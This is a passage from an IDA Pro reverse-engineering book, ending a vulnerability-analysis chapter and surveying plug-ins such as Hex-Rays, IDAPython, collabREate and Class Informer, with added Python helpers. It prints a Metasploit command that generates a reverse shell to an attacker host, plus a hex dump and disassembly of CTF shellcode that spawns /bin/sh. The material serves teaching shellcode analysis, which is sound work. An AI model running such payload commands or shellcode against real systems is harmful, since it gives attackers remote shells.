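The data reference that the script follows from the PLT can also be recovered from the raw bytes of a PLT stub. The following standalone Python 3 sketch assumes a non-position-independent 32-bit x86 ELF binary, in which a PLT entry begins with an absolute indirect jump (jmp dword ptr [addr], encoded as FF 25 followed by a 32-bit little-endian address). The stub bytes below are hypothetical; they were constructed to match the address reported in the example output rather than taken from the example binary, and got_slot_from_plt_stub is an illustrative name.

```python
import struct


def got_slot_from_plt_stub(stub):
    """Return the address read by a leading jmp dword ptr [addr] (FF 25 imm32)."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        raise ValueError("stub does not start with an absolute indirect jmp")
    return struct.unpack_from("<I", stub, 2)[0]


# Hypothetical first instruction of the .plt entry for memset
stub = bytes.fromhex("FF 25 D8 18 06 08")
got_entry = got_slot_from_plt_stub(stub)
print("GOT entry is at 0x%08x" % got_entry)
```

Position-independent binaries use a register-relative jump in their PLT entries instead, so this decoding would not apply to them as written.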

Analyzing Shellcode

Up to this point, this chapter has focused on the use of IDA as an offensive

tool. Before we conclude, it might be nice to offer up at least one use for

IDA as a defensive tool. As with any other binary code, there is only one way

to determine what shellcode does, and that is to disassemble it. Of course,

the first requirement is to get your hands on some shellcode. If you are the


curious type and have always wondered how Metasploit payloads work, you

might simply use Metasploit to generate a payload in raw form and then dis-

assemble the resulting blob.

The following Metasploit command generates a payload that calls back

to port 4444 on the attacker’s computer and grants the attacker a shell on

the target Windows computer:

# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.15.20 R > w32_reverse_4444

The resulting file contains the requested payload in its raw binary form.

The file can be opened in IDA (in binary form since it has no specific format)

and a disassembly obtained by converting the displayed bytes into code.

Another place that shellcode can turn up is in network packet captures.

Narrowing down exactly which packets contain shellcode can be a challenge,

and you are invited to check out any of the vast number of books on network

security that will be happy to tell you just how to find all those nasty packets.

For now consider the reassembled client stream of an attack observed on the

Capture the Flag network at DEFCON 18:

00000000 AD 02 0E 08 01 00 00 00 47 43 4E 93 43 4B 91 90 ........GCN.CK..

00000010 92 47 4E 46 96 46 41 4A 43 4F 99 41 40 49 48 43 .GNF.FAJCO.A@IHC

00000020 4A 4E 4B 43 42 49 93 4B 4A 41 47 46 46 46 43 90 JNKCBI.KJAGFFFC.

00000030 4E 46 97 4A 43 90 42 91 46 90 4E 97 42 48 41 48 NF.JC.B.F.N.BHAH

00000040 97 93 48 97 93 42 40 4B 99 4A 6A 02 58 CD 80 09 ..H..B@K.Jj.X...

00000050 D2 75 06 6A 01 58 50 CD 80 33 C0 B4 10 2B E0 31 .u.j.XP..3...+.1

00000060 D2 52 89 E6 52 52 B2 80 52 B2 04 52 56 52 52 66 .R..RR..R..RVRRf

00000070 FF 46 E8 6A 1D 58 CD 80 81 3E 48 41 43 4B 75 EF .F.j.X...>HACKu.

00000080 5A 5F 6A 02 59 6A 5A 58 99 51 57 51 CD 80 49 79 Z_j.YjZX.QWQ..Iy

00000090 F4 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 54 .Rh//shh/bin..PT

000000A0 53 53 B0 3B CD 80 41 41 49 47 41 93 97 97 4B 48 SS.;..AAIGA...KH

This dump clearly contains a mix of ASCII and binary data, and based
on other data associated with this particular network connection, the binary
data is assumed to be shellcode. Packet-analysis tools such as Wireshark14
often possess the capability to extract TCP session content directly to a file.
In the case of Wireshark, once you find a TCP session of interest, you can
use the Follow TCP Stream command and then save the raw stream content
to a file. The resulting file can then be loaded into IDA (using IDA’s binary
loader) and analyzed further.

14. See http://www.wireshark.org/.

Often network attack sessions contain a mix of shellcode and application
layer content. In order to properly disassemble the shellcode, you must
correctly locate the first bytes of the attacker’s payload. The level of
difficulty in doing this will vary from one attack to the next and one
protocol to the next. In some cases, long NOP slides will be obvious (long
sequences of 0x90 for x86 attacks), while in other cases (such as the current
example), locating the NOPs, and therefore the shellcode, may be less obvious.
The preceding hex dump, for example, actually contains a NOP slide;
however, instead of actual x86 NOPs, it uses a randomly generated sequence of
1-byte instructions that have no effect on the shellcode that follows.
Because a very large number of permutations exist for such a NOP slide, the
danger that a network intrusion detection system will recognize and alert
on the NOP slide is diminished. Finally, some knowledge of the application
that is being attacked may help in distinguishing data elements meant for
consumption by the application from shellcode meant to be executed. In
this case, with a little effort, IDA disassembles the preceding binary content
as shown here:

➊ seg000:00000000                 db 0ADh ; ¡
  seg000:00000001                 db    2
  seg000:00000002                 db  0Eh
  seg000:00000003                 db    8
  seg000:00000004                 db    1
  seg000:00000005                 db    0
  seg000:00000006                 db    0
  seg000:00000007                 db    0
  seg000:00000008 ; --------------------------------------------------------------
  seg000:00000008                 inc     edi
  seg000:00000009                 inc     ebx
  seg000:0000000A                 dec     esi
  ...             ; NOP slide and shellcode initialization omitted
  seg000:0000006D                 push    edx
  seg000:0000006E                 push    edx
  seg000:0000006F
  seg000:0000006F loc_6F:                         ; CODE XREF: seg000:0000007E↓j
  seg000:0000006F                 inc     word ptr [esi-18h]
  seg000:00000073                 push    1Dh
  seg000:00000075                 pop     eax
➋ seg000:00000076                 int     80h     ; LINUX - sys_pause
  seg000:00000078                 cmp     dword ptr [esi], 4B434148h
  seg000:0000007E                 jnz     short loc_6F
  seg000:00000080                 pop     edx
  seg000:00000081                 pop     edi
  seg000:00000082                 push    2
  seg000:00000084                 pop     ecx
  seg000:00000085
  seg000:00000085 loc_85:                         ; CODE XREF: seg000:0000008F↓j
  seg000:00000085                 push    5Ah ; 'Z'
  seg000:00000087                 pop     eax
  seg000:00000088                 cdq
  seg000:00000089                 push    ecx
  seg000:0000008A                 push    edi
  seg000:0000008B                 push    ecx
➌ seg000:0000008C                 int     80h     ; LINUX - old_mmap
  seg000:0000008E                 dec     ecx
  seg000:0000008F                 jns     short loc_85
  seg000:00000091                 push    edx
  seg000:00000092                 push    'hs//'
  seg000:00000097                 push    'nib/'
  ...             ; continues to invoke execve to spawn the shell


One point worth noting is that the first 8 bytes of the stream ➊ are actually
protocol data, not shellcode, and thus we have chosen not to disassemble
them. Also, IDA seems to have misidentified the system calls that are being
made at ➋ and ➌. We have omitted the fact that this exploit was targeting a
FreeBSD application, which would be helpful in decoding the system call
numbers being used in the payload. Because IDA is only capable of annotating
Linux system call numbers, we are left to do a little research to learn that
FreeBSD system call 29 (1Dh) is actually recvfrom (rather than pause) and
system call 90 (5Ah) is actually the dup2 function (rather than old_mmap).
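The manual corrections described above can be captured in a small lookup so that they do not have to be rediscovered for each payload. The following standalone Python 3 sketch is deliberately tiny: the SYSCALL_NAMES table contains only the two numbers discussed in the text (the Linux names are the ones IDA printed), and the helper names syscall_name and dword_as_text are hypothetical. It also decodes the immediate constants seen in the listing, which is a quick way to recognize embedded strings.

```python
import struct

# Only the two system call numbers discussed in the text are included here.
SYSCALL_NAMES = {
    "linux": {29: "pause", 90: "old_mmap"},
    "freebsd": {29: "recvfrom", 90: "dup2"},
}


def syscall_name(target_os, number):
    """Look up a system call name for the given OS, or 'unknown'."""
    return SYSCALL_NAMES[target_os].get(number, "unknown")


def dword_as_text(value):
    """Return the 4 bytes of a 32-bit immediate in little-endian memory order."""
    return struct.pack("<I", value).decode("ascii")


for number in (0x1D, 0x5A):
    print("int 80h with eax=%02Xh: linux=%s freebsd=%s" % (
        number, syscall_name("linux", number), syscall_name("freebsd", number)))

# The constant compared against [esi] in the receive loop
marker = dword_as_text(0x4B434148)
print("marker:", marker)

# push 'hs//' then push 'nib/': the last value pushed sits lowest in memory
pushed = [0x68732F2F, 0x6E69622F]
stack_string = "".join(dword_as_text(v) for v in reversed(pushed))
print("stack string:", stack_string)
```

Read this way, the loop at loc_6F appears to keep receiving data until the buffer begins with the marker bytes, and the two pushes build the path of the shell that is later passed to execve.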

Because it lacks any header information useful to IDA, shellcode will

generally require extra attention in order to be properly disassembled. In

addition, shellcode encoders are frequently employed as a means of evading

intrusion detection systems. Such encoders have an effect very much like the

effect that obfuscation tools have on standard binaries, further complicating

the shellcode-disassembly process.
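Returning to the substitute NOP slide in the captured stream, a simple heuristic can help locate where such a slide ends and the real shellcode begins. The following standalone Python 3 sketch assumes that the slide is built only from the 1-byte x86 instructions inc/dec reg (40h through 4Fh), nop and xchg eax, reg (90h through 97h), and cwde/cdq (98h and 99h). That set is an assumption chosen to fit this example, not a general rule, and slide_extent is a hypothetical helper. The data is the first 80 bytes of the hex dump shown earlier.

```python
# First 0x50 bytes of the reassembled client stream from the hex dump above
STREAM_HEAD = bytes.fromhex(
    "AD 02 0E 08 01 00 00 00 47 43 4E 93 43 4B 91 90 "
    "92 47 4E 46 96 46 41 4A 43 4F 99 41 40 49 48 43 "
    "4A 4E 4B 43 42 49 93 4B 4A 41 47 46 46 46 43 90 "
    "4E 46 97 4A 43 90 42 91 46 90 4E 97 42 48 41 48 "
    "97 93 48 97 93 42 40 4B 99 4A 6A 02 58 CD 80 09"
)

# Assumed set of 1-byte "filler" opcodes: inc/dec reg, nop/xchg eax,reg, cwde, cdq
SLIDE_BYTES = set(range(0x40, 0x50)) | set(range(0x90, 0x98)) | {0x98, 0x99}


def slide_extent(data, start):
    """Return (start, end) of the run of filler opcodes beginning at start."""
    end = start
    while end < len(data) and data[end] in SLIDE_BYTES:
        end += 1
    return start, end


PROTOCOL_HEADER_LEN = 8  # the first 8 bytes are protocol data, per the text
start, end = slide_extent(STREAM_HEAD, PROTOCOL_HEADER_LEN)
print("slide covers 0x%02X-0x%02X (%d bytes); next opcode byte is %02Xh"
      % (start, end - 1, end - start, STREAM_HEAD[end]))
```

The first byte after the run is 6Ah (push imm8), which matches the push 2/pop eax sequence visible at offset 4Ah in the hex dump.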

Summary

Keep in mind that IDA is not a silver bullet you can use to make vulnerabili-

ties pop out of binaries. If your ultimate goal is to perform vulnerability anal-

ysis using only IDA, then you would be wise to automate your efforts to the

maximum extent possible. As you develop algorithms for analyzing binaries,

you should always consider how you might automate those algorithms in

order to save time on future analysis tasks. Finally, it is important to under-

stand that no amount of reading through the best books available can make

you proficient at vulnerability analysis and exploit development. If you are

interested in developing your skills, you must practice. A large number of

sites offer practice challenges for just this purpose; an excellent starting

point is the Wargames section at http://www.overthewire.org/wargames/.


REAL-WORLD IDA PLUG-INS

Given the variety of uses that IDA has been

put to over the years, it should not be sur-

prising that a large number of plug-ins have

been developed to add capabilities that people

have found useful in their particular applications of

IDA. If you decide that you would like to take advantage

of other people’s work, know that there is no one-stop shop for publicly avail-

able plug-ins. The three principal locations where you may find references to

plug-ins are the Hex-Rays download page,1 the OpenRCE downloads page,2

and the RCE reverse engineering forums.3 Of course, spending a little time

with Google doesn’t hurt either.

As with any other piece of publicly available software, you may face some

challenges while attempting to install third-party plug-ins. In cases where

plug-in developers have elected to publish their efforts, plug-ins are distrib-

uted in the form of source code, a compiled binary, or both. If forced to

1. See http://www.hex-rays.com/idapro/idadown.htm.

2. See http://www.openrce.org/downloads/.

3. See http://www.woodmann.com/forum/index.php.

500 Chapter 23

build from source, you must deal with the make files (or equivalents) sup-

plied by the plug-in’s author, which may or may not work with your particu-

lar compiler configuration. On the other hand, if a plug-in is distributed in

binary form, it may have been built with a version of the SDK that is incom-

patible with your version of IDA, which means you will not be able to run the

plug-in at all until the author elects to release an updated version. Finally,

the plug-in may have external dependencies that must be satisfied in order

to build it, run it, or both.

In this chapter we will review several popular IDA plug-ins; their pur-

pose; where to obtain them; and how to build, install, and use them.

Hex-Rays

Perhaps the granddaddy of all IDA plug-ins, Hex-Rays is a decompiler plug-in

capable of generating “C-like pseudocode”4 for functions in compiled ARM

or 32-bit x86 binaries. Hex-Rays is a commercial plug-in created and sold by

the same company that produces IDA. The decompiler is available for all 32-

bit versions of IDA. Hex-Rays is shipped in binary form only, and installation

is performed by copying the supplied plug-in into <IDADIR>/plugins. A man-

ual for using Hex-Rays is available online5 that provides a nice overview of

using Hex-Rays and that contains some documentation for the Hex-Rays

SDK6 used to create decompiler plug-ins.

Once installed, the decompiler is activated via View ▸ Open Subviews ▸

Pseudocode (hotkey F5) to decompile the function containing the cursor or

via File ▸ Produce File ▸ Create C File (hotkey CTRL-F5) to decompile all

functions in the database and save them to a file.

When you generate pseudocode for a single function, a new subview

(tabbed window) containing the decompiled function opens in the IDA

display. Listing 23-1 shows an example of pseudocode generated using Hex-

Rays to examine a Defcon 15 Capture the Flag binary. Each time you generate

pseudocode for a function, Hex-Rays opens a new tabbed window to display

the result.

signed int __cdecl sub_80489B4(int fd)
{
  int v1; // eax@1
  signed int v2; // edx@1
  char buf; // [sp+4h] [bp-208h]@2
  char s; // [sp+104h] [bp-108h]@2

  v1 = sub_8048B44(fd, (int)"Hans Brix? Oh no! Oh, herro. Great to see you again, Hans! ", 0);
  v2 = -1;
  if ( v1 != -1 )
  {
    recv(fd, &buf, 0x100u, 0);
    snprintf(&s, 0x12Cu, "Hans Brix says: \"%s\"\n", &buf);
    sub_8048B44(fd, (int)&s, 0);
    v2 = 0;
  }
  return v2;
}

Listing 23-1: Example Hex-Rays output

4. See http://www.hex-rays.com/decompiler.shtml.

5. See http://www.hex-rays.com/manual/.

6. See http://www.hexblog.com/?p=107. Not to be confused with IDA SDK.

Note that while Hex-Rays uses a slightly different dummy-naming con-

vention for arguments (a1, a2, etc.) and local variables (v1, v2) than is used

in IDA, the ability to distinguish between function parameters and local vari-

ables remains. If you have changed the names of any variables within the dis-

assembly, the decompiler will make use of those names rather than internally

generated dummy names.

Hex-Rays utilizes the same cues employed by IDA to deduce datatypes;

however, you will probably notice some type casting taking place in order to

coerce type conversions where the types used in an operation do not appear

to match Hex-Rays’s expectations. As a convenience, you may tell Hex-Rays to

hide all casts by right-clicking and choosing the Hide Casts menu option.

Once a pseudocode window has been opened, you may use it almost like

a source code editor and navigator. Navigating and editing within a pseudo-

code window are much like navigating and editing within a standard IDA dis-

assembly window. Double-clicking a function name, for example, immediately

causes the selected function to be decompiled within the pseudocode win-

dow. Many editing features are available via context-sensitive menus, as shown

in Figure 23-1, including the ability to change variable and function names

and types.

Figure 23-1: Hex-Rays decompiler editing options

Name          Hex-Rays Decompiler
Author        Ilfak Guilfanov, Hex-Rays.com
Distribution  Binary only
Price         US$2,239
Description   Generates C-like pseudocode from compiled ARM or 32-bit x86 functions
Information   http://www.hex-rays.com/decompiler.shtml


Further, changes that you make to variable names, function names,

and datatypes are propagated back to IDA’s disassembly windows. Through

repeated application of Rename and Set Type, and by hiding casts, List-

ing 23-1 is easily transformed into the following.

signed int __cdecl sub_80489B4(int fd)
{
  int length; // eax@1
  signed int error; // edx@1
  char buf[256]; // [sp+4h] [bp-208h]@2
  char s[264]; // [sp+104h] [bp-108h]@2

  length = write_string(fd, "Hans Brix? Oh no! Oh, herro. Great to see you again, Hans! ", 0);
  error = -1;
  if ( length != -1 )
  {
    recv(fd, buf, 256u, 0);
    snprintf(s, 300u, "Hans Brix says: \"%s\"\n", buf);
    write_string(fd, s, 0);
    error = 0;
  }
  return error;
}
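The array sizes applied with Set Type in the cleaned-up listing are consistent with the frame offsets that Hex-Rays reports in its variable comments. The short calculation below is a sketch under two assumptions of ours: that the bp-relative offsets are the ones that matter, and that no other locals sit between the two buffers (the decompiler shows only these two stack variables).

```python
# Frame offsets copied from the decompiler comments in Listing 23-1.
BUF_OFFSET = -0x208   # char buf;  [bp-208h]
S_OFFSET = -0x108     # char s;    [bp-108h]


def span(lower, upper):
    """Bytes available between two frame offsets (lower address first)."""
    return upper - lower


buf_size = span(BUF_OFFSET, S_OFFSET)   # room before the next local begins
s_size = span(S_OFFSET, 0)              # room before the saved frame pointer

print("buf: %d bytes, s: %d bytes" % (buf_size, s_size))
print("recv limit 0x100 = %d, snprintf limit 0x12C = %d" % (0x100, 0x12C))
```

Laying the numbers side by side also makes it easy to compare each buffer with the length argument passed to the call that fills it: the 300-byte limit given to snprintf is larger than the 264 bytes computed for s.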

Keep in mind that information is lost during compilation. There is no

need to retain symbol information for any nonexternal symbols, and com-

piler optimizations tend to remove redundancies and streamline code. As a

result, in addition to the liberal use of type casts, you are also likely to notice

more goto statements in the generated pseudocode than you might generally

expect to see in human-generated C code. This is not unexpected, because it

is often very difficult to neatly map compiler-generated control flows back to

their original C form. However, Hex-Rays is capable of recognizing complex

C constructs such as switch statements, and a tremendous amount of work

has been put into recognizing standard code sequences utilized by various C

compilers.

For all of its capabilities, you are encouraged not to become overreliant

on Hex-Rays. C source is certainly easier to read and more succinct than its

corresponding assembly representation, but decompilation is not a perfect

science. In reading Hex-Rays pseudocode, you are trusting that what you see

is a faithful representation of the underlying assembly, and while Ilfak works

very hard to ensure that Hex-Rays is as accurate as possible, there are certainly

edge cases that may prove problematic for Hex-Rays. It is highly recommended

that you back up any conclusions you draw from reading Hex-Rays pseudo-

code by verifying them against the underlying assembly code. Finally, keep in

mind that while Hex-Rays may be used on binaries compiled from C++ code,

it is only capable of generating C code, and the resulting code will lack any

features that are specific to C++.


IDAPython

IDAPython began life as a third-party IDA plug-in developed by Gergely

Erdelyi and is covered more thoroughly in Chapter 15. Its popularity among

IDA users spread rapidly, and since IDA 5.4, IDAPython has shipped as a

standard plug-in with all versions of IDA. Nonetheless, IDAPython remains

available as an open source project that you may download and modify to

suit your needs.

Instructions for building IDAPython are available in the file BUILDING.txt

contained in the IDAPython source, while instructions for installation are

available on the IDAPython website. If you elect to build IDAPython from

source, a number of dependencies must be satisfied. First and foremost is

the need to have a working installation of 32-bit Python. Windows and OS X

users are recommended to obtain and install Python using one of the install-

ers available at the Python website.7 Linux users can generally get by with the

32-bit version of Python available for their flavor of Linux. Note that as of this

writing, IDAPython is not compatible with Python version 3.x.

The Python build script supplied with IDAPython, build.py, makes use of

the Simplified Wrapper Interface Generator (SWIG)8 to generate the com-

ponents required to interface Python to IDA’s C++ libraries, and the header

files that ship with the IDA SDK (since version 5.4) contain a number of

macro declarations to ensure that they are compatible with SWIG. In addi-

tion to SWIG, the build process requires a C++ compiler. For Windows builds,

the build script is configured to use Microsoft Visual C++,9 while for Linux

and Mac builds, the build process utilizes g++.

collabREate

The collabREate plug-in is designed to facilitate collaboration between multi-

ple users analyzing the same binary file. The goals of the project are to provide

a natural integration of a plug-in component representing the synchronization

client with a robust server component backed by a SQL database and capable

of supporting features beyond simple database synchronization.

Name          IDAPython
Author        Gergely Erdelyi
Distribution  Source and binary (A binary version also ships with IDA.)
Price         Free
Description   Python scripting engine for IDA Pro
Information   http://code.google.com/p/idapython/

7. See http://www.python.org/.

8. See http://www.swig.org/.

9. To obtain a free, stripped-down version of Visual C++, please visit http://www.microsoft.com/express/.


From a high-level perspective, collabREate owes much to the IDA Sync

project.10 The collabREate plug-in processes database updates and communicates

with a remote server component to synchronize database updates with

additional project members. Because IDA is a single-threaded application,

some mechanism for dealing with asynchronous non-blocking network com-

munications is necessary. In IDA versions prior to 6.0, the asynchronous

communications component derives from the Windows Asynchronous Sock-

ets techniques used by IDA Sync; however, with the introduction of IDA 6.0,

asynchronous communications are now handled using Qt socket classes,

allowing collabREate to be used on all IDA-supported platforms.

CollabREate takes an integrated approach to capturing user actions by

leveraging IDA’s process and IDB event-notification mechanisms. By hook-

ing various database change notifications, collabREate is able to seamlessly

propagate database updates to the collabREate server. The types and num-

bers of change notifications generated by IDA have grown with each release

of IDA, and collabREate endeavors to hook as many useful notifications as it

possibly can for the version of IDA that it has been built for. An interesting

side effect of using collabREate is that it allows users of very different versions

of IDA (5.2 and 6.0, for example) to synchronize their activities even when

they would be unable to exchange .idb files with one another.11 The collab-

REate architecture offers true publish and subscribe capabilities to partici-

pating users. A user may selectively choose to publish her changes to the

collabREate server, subscribe to changes posted to the server, or both pub-

lish and subscribe. For example, an experienced user may wish to share

(publish) her changes with a group while blocking (not subscribing to) all

changes made by other users. Users may select the types of actions to which

they may publish and subscribe, such as byte-value changes, name changes,

and the addition or deletion of comments. For example, one user may wish

only to publish comments, while another user may wish to subscribe only to

name changes and patched-byte notifications.
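The selective publish and subscribe model can be illustrated with a few lines of Python. This is a sketch of the idea only and is not taken from the collabREate source: the update categories, the Profile class, and the deliver function are all hypothetical names chosen for the example.

```python
from dataclasses import dataclass, field

# Hypothetical update categories; the real plug-in defines its own set.
UPDATE_TYPES = {"byte_patch", "name", "comment"}


@dataclass
class Profile:
    """What one user has chosen to share and to receive."""
    user: str
    publish: set = field(default_factory=set)
    subscribe: set = field(default_factory=set)


def deliver(update_type, sender, profiles):
    """Return the users who should receive an update of the given type."""
    if update_type not in sender.publish:
        return []   # the sender chose not to share this kind of change
    return [p.user for p in profiles
            if p is not sender and update_type in p.subscribe]


# An experienced user who shares everything but accepts nothing.
expert = Profile("expert", publish=set(UPDATE_TYPES))
# A user who publishes only comments and subscribes to names and patches.
commenter = Profile("commenter", publish={"comment"},
                    subscribe={"name", "byte_patch"})
# A subscribe-only user.
reader = Profile("reader", subscribe=set(UPDATE_TYPES))
team = [expert, commenter, reader]

print(deliver("name", expert, team))
print(deliver("name", commenter, team))
print(deliver("comment", commenter, team))
```

Keeping the publish and subscribe sets separate is what allows the combinations described above, such as a user who shares changes without ever receiving any.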

One of the most significant features of the collabREate plug-in is its degree

of integration with the IDA SDK. IDA notifications are tied to specific data-

base actions, not specific user actions. The fact that user actions happen to

trigger IDA notifications is, of course, critical to the collaborative process;

however, notifications can be triggered by other means as well. Scripts and

API function calls can generate notification messages as well. As a result, the

actions of a script that patches database bytes, renames locations or variables,

or inserts new comments will be published to the collabREate server and will

ultimately be shared with other IDA users working on the same project.

Name          collabREate
Author        Chris Eagle and Tim Vidas
Distribution  C++ source and binary (including IDA freeware)
Price         Free
Description   Collaborative framework for synchronizing remote IDA sessions
Information   http://www.idabook.com/collabreate/

10. See http://pedram.redhive.com/code/ida_plugins/ida_sync/.

11. Older versions of IDA are typically unable to open .idb files created with newer versions of IDA.

The collabREate server component is currently implemented in Java and

utilizes JDBC12 to communicate with a backend SQL database. The server is

responsible for user and project management. User accounts are managed

via a command-line interface to the server, while projects are created by users

as they connect to the server. Following authentication with the server, a user’s

collabREate plug-in sends the MD5 hash of the input file that the user is

analyzing to the server. The MD5 value is used to ensure that multiple users

are in fact working on identical input files. Upon initial connection, users

indicate the types of updates that they would like to subscribe to, at which

point the server forwards all updates that have been cached since the user’s

last session. CollabREate’s Project Selection dialog is shown in Figure 23-2.

Figure 23-2: CollabREate Project Selection dialog

Users are presented with a drop-down list of projects that are compatible

with the current database. As an option, it is always possible to create a new

project that requires the user to enter a project description for others to view.

The collabREate server is capable of forking existing projects to allow

users to create alternate branches of a project without impacting other users.

This is a useful feature if you want to make (and track) a significant number

of changes to a database without forcing those changes on other users. Since

the server is capable of handling multiple projects related to a single binary

input file, the plug-in and the server take additional steps to ensure that users

are connecting to the proper project for their particular database.

The server does not provide rollback capability but does provide for a

form of “save point.” A snapshot can be made at any time; then, to return to

that database state, a user could re-open the binary (new .idb file) and fork a

new project from the snapshot. This allows users to return to a specific point

in time in the reversing process. CollabREate’s fork and snapshot features are

accessed through the same hotkey sequence used for initial activation of

the plug-in, which results in the dialog shown in Figure 23-3.

Figure 23-3: CollabREate Select Command dialog

12. JDBC is the Java Database Connectivity API.
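The MD5 comparison that collabREate uses to match users with compatible projects is easy to sketch. The code below is an illustration under our own assumptions: the function names and the representation of a project as a (name, md5) pair are hypothetical, and the actual plug-in and server are written in C++ and Java respectively.

```python
import hashlib


def input_file_md5(path, chunk_size=65536):
    """Hash the analyzed input file in chunks so large binaries fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def compatible_projects(projects, md5_hex):
    """Keep only projects whose recorded hash matches the local input file.

    `projects` is a list of (name, md5_hex) pairs, a hypothetical stand-in
    for whatever the server stores about each project.
    """
    return [name for name, project_md5 in projects if project_md5 == md5_hex]
```

Because forked projects share the hash of their parent, a filter of this kind can return several candidates for one binary, which is why the user is still asked to choose from a list.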


A final feature of the collabREate server is the ability to restrict users

to specific types of updates. For example, one user may be restricted to a

subscribe-only profile, while another user may be allowed to publish only

comments, while a third is allowed to publish all types of updates.

ida-x86emu

Reverse engineering binaries often involves hand tracing through code in

order to develop an understanding of how a function behaves. In order to

do this, you need a solid understanding of the instruction set you are analyz-

ing and a handy reference to refresh your memory when you encounter an

instruction that doesn’t look familiar. An instruction emulator can be a useful

tool to track all of the register and CPU state changes that take place over a

series of instructions. The ida-x86emu plug-in, which was discussed in detail in

Chapter 21 and whose information is shown again here, is one such emulator.

This plug-in is distributed in source and binary form and is compatible

with IDA SDK versions 4.6 and later. The plug-in is distributed with build

scripts and project files to facilitate building with MinGW tools or Microsoft

Visual Studio on Windows platforms and g++ on non-Windows platforms.

A precompiled binary version of the plug-in for use with IDA freeware is

included in the distribution. ida-x86emu is compatible with all Qt-based ver-

sions of IDA; however, prior to IDA 6.0, the plug-in is compatible with only

the Windows GUI version of IDA.

The plug-in was developed with self-modifying code in mind and oper-

ates by reading instruction bytes from the current IDA database, decoding

the instruction, and performing the associated operation. Operations may

involve updating the emulator’s internal register variables or writing back to

the database in the case of self-modifying code. A simulated stack and a heap

are implemented by allocating new IDA segments that are read and written

as appropriate. For more detailed information on using ida-x86emu, please

refer to Chapter 21.
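The read, decode, and execute cycle described above, including the write-back that makes self-modifying code work, can be shown with a toy emulator. This sketch is not derived from the ida-x86emu source: it handles only a handful of 32-bit x86 encodings, uses a Python bytearray as a stand-in for the IDA database, and the function name emulate is our own.

```python
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def emulate(image, eip=0, max_steps=100):
    """Fetch, decode, and execute instructions directly from `image`.

    `image` is a bytearray standing in for the database; writes made by
    the emulated code are visible to later instruction fetches.
    """
    regs = dict.fromkeys(REGS, 0)
    for _ in range(max_steps):
        op = image[eip]
        if op == 0x90:                                  # nop
            eip += 1
        elif 0x40 <= op <= 0x47:                        # inc r32
            name = REGS[op - 0x40]
            regs[name] = (regs[name] + 1) & 0xFFFFFFFF
            eip += 1
        elif 0x48 <= op <= 0x4F:                        # dec r32
            name = REGS[op - 0x48]
            regs[name] = (regs[name] - 1) & 0xFFFFFFFF
            eip += 1
        elif 0xB8 <= op <= 0xBF:                        # mov r32, imm32
            (imm,) = struct.unpack_from("<I", image, eip + 1)
            regs[REGS[op - 0xB8]] = imm
            eip += 5
        elif op == 0xC6 and image[eip + 1] == 0x05:     # mov byte [addr], imm8
            (addr,) = struct.unpack_from("<I", image, eip + 2)
            image[addr] = image[eip + 6]                # write back to the image
            eip += 7
        elif op == 0xC3:                                # ret ends the run
            break
        else:
            raise ValueError("unsupported opcode %#04x at %#x" % (op, eip))
    return regs


# mov eax, 5 / mov byte [0x0D], 0x40 / nop / dec eax / ret
# The second instruction patches the "dec eax" at offset 0x0D into "inc eax".
program = bytearray.fromhex("B8 05 00 00 00 C6 05 0D 00 00 00 40 90 48 C3")
result = emulate(program)
print("eax = %d, patched byte = %#04x" % (result["eax"], program[0x0D]))
```

Because each instruction is fetched from the image at the moment it executes, the emulator sees the patched byte rather than the original one, which is the property that matters when stepping through self-decoding code.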

Class Informer

Recall from Chapter 8 that C++ programs may include information that can

assist you in recovering class names and class hierarchies. This embedded

information is designed to support C++ Runtime Type Identification (RTTI).

Name          ida-x86emu
Author        Chris Eagle
Distribution  Source for SDK v6.1 and binaries for all versions of IDA from 5.0,
              including IDA Freeware. Source is backward compatible to SDK
              version 4.9.
Price         Free
Description   Embedded x86 instruction emulator for IDA
Information   http://www.idabook.com/ida-x86emu/


The C++ Class Informer plug-in by Sirmabus is designed to assist in the process

of reverse engineering C++ code that was compiled using Microsoft Visual

Studio. Class Informer automates much of the process described by Igor

Skochinsky in his OpenRCE article on reversing Microsoft Visual C++13 by

identifying virtual function tables (vtables or vftables) and RTTI information

and then extracting related class name and inheritance information.

Upon activation, Class Informer displays the options dialog shown in Fig-

ure 23-4, allowing the user to dictate where within the binary Class Informer

should scan for vtables and permitting the user to control the verbosity of

Class Informer’s output.

Figure 23-4: Class Informer options dialog

Once the user clicks Continue, Class Informer begins its scan, which may

take some time depending on the size of the binary and the number of vir-

tual function tables that Class Informer encounters. When complete, Class

Informer opens a new tabbed window within IDA in order to summarize

its findings. A partial listing, representative of Class Informer’s output, is

shown here.

X Vftable   Y Method count   Z Class & structure info
0041A298    0003             ChildClass; [MI]
0041A2A8    0003             ChildClass: SuperClass1, SuperClass2; [MI]
0041A2B8    0003             SuperClass1; [SI]
0041A2C8    0003             SuperClass2; [SI]
0041A2D8    0004             BaseClass; [SI]
0041A2EC    0005             SubClass: BaseClass; [SI]

13. See http://www.openrce.org/articles/full_view/23.

Name          Class Informer
Author        Sirmabus
Distribution  Binary only
Price         Free
Description   MSVC C++ class identifier
Download      http://www.macromonkey.com/downloads/IDAPlugIns/Class_Informer102.zip

For each virtual function table discovered, Class Informer displays the

address of the vtable X, the method count Y (equal to the number of func-

tion pointers contained in the vtable), and summary information about each

class Z derived from embedded RTTI information. Recovered class informa-

tion includes the name of the class, the name of any superclasses, and an indi-

cation of whether the class inherits from a single base class ([SI]) or multiple

base classes ([MI]). For each vtable discovered, Class Informer also applies

structure templates to all of the RTTI-related data structures associated with

the class as well as naming each structure and the class’s vtable in accordance

with Microsoft’s name-mangling scheme. This results in a substantial time

saving for anyone who may be reverse engineering Visual C++ code of any

complexity.
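If you save Class Informer's results as text, the three columns are simple to pull apart for further processing. The parser below is a sketch that assumes rows look exactly like those in the sample listing; the function name parse_row is ours, and treating the method count as a decimal number is an assumption, since the sample values do not reveal the base.

```python
def parse_row(line):
    """Split one output row into vtable address, method count, and class info."""
    address, count, rest = line.split(None, 2)
    names, _, flag = rest.rpartition(";")
    # ": " (colon then space) separates the class from its bases; a bare
    # "::" inside a namespace-qualified name is left alone.
    cls, _, bases = names.partition(": ")
    return {
        "vftable": int(address, 16),
        "methods": int(count),          # assumed decimal
        "class": cls.strip(),
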